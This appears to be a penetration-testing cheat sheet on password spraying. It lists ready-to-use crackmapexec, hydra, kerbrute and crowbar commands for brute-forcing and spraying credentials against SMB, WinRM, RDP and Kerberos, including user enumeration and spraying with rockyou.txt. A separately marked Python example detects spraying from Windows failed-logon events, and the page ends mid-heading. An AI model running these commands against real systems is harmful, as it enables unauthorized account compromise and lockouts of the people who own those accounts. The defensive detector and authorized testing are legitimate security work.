Password Spraying
To create passwords that target a specific user, based on the information we have available:
cupp
crunch
crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
crackmapexec smb <IP> -u users.txt -p users.txt --no-bruteforce
crackmapexec smb <IP> -u users.txt -p users.txt --continue-on-success
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV
hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
These attempts can also lock out user accounts, so this technique should be used carefully.
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
Examples:
Username bruteforce
kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
Password bruteforce
kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
Password spray
kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
crackmapexec winrm <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
crowbar -b rdp -s <IP>/CIDR -u <USER> -C <PASSWORDS_LIST>
crowbar -b rdp -s <IP>/CIDR -U <USERS_LIST> -C <PASSWORDS_LIST>
hydra -f -L <USERS_LIST> -P <PASSWORDS_LIST> rdp://<IP> -u -vV
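How the spraying above looks from the defender's side, as an added example that is not part of the original page: it flags a source that fails authentication against many distinct accounts with only a few attempts each. The records, addresses, account names and thresholds are constructed assumptions; 4771 (Kerberos pre-authentication failed) and 4625 (failed logon) are the Windows event IDs such failures are logged under.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAILURE_IDS = {4771, 4625}  # Kerberos pre-auth failed, failed logon

# Constructed sample records (not real logs): (time, source, account, event ID).
T0 = datetime(2024, 1, 1, 9, 0, 0)
SAMPLE = (
    # one source, 12 accounts, one failure each: spray pattern
    [(T0 + timedelta(seconds=i), "10.0.0.50", f"user{i:02d}", 4771) for i in range(12)]
    # one source, one account, 15 failures: brute force, not a spray
    + [(T0 + timedelta(seconds=i), "10.0.0.7", "svc_backup", 4625) for i in range(15)]
    # ordinary mistyped password followed by a successful logon (4624)
    + [(T0, "10.0.0.9", "alice", 4625), (T0, "10.0.0.9", "alice", 4624)]
)

def detect_spray(events, window=timedelta(minutes=5), min_users=10, max_per_user=3):
    """Return {source: [accounts]} for sources whose failures inside one
    sliding window hit >= min_users accounts with <= max_per_user tries each."""
    by_src = defaultdict(list)
    for ts, src, user, event_id in events:
        if event_id in FAILURE_IDS:
            by_src[src].append((ts, user.lower()))
    flagged = {}
    for src, fails in by_src.items():
        fails.sort()
        start = 0
        counts = defaultdict(int)  # failures per account inside the window
        for ts, user in fails:
            counts[user] += 1
            # drop failures that have aged out of the window
            while ts - fails[start][0] > window:
                old = fails[start][1]
                counts[old] -= 1
                if not counts[old]:
                    del counts[old]
                start += 1
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                flagged[src] = sorted(counts)
    return flagged

if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE).items():
        print(f"possible password spray from {src}: {len(users)} accounts")
```

The window and thresholds are starting points to tune against the domain's lockout policy and normal failure volume.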
kerbrute:
With kerbrute.py: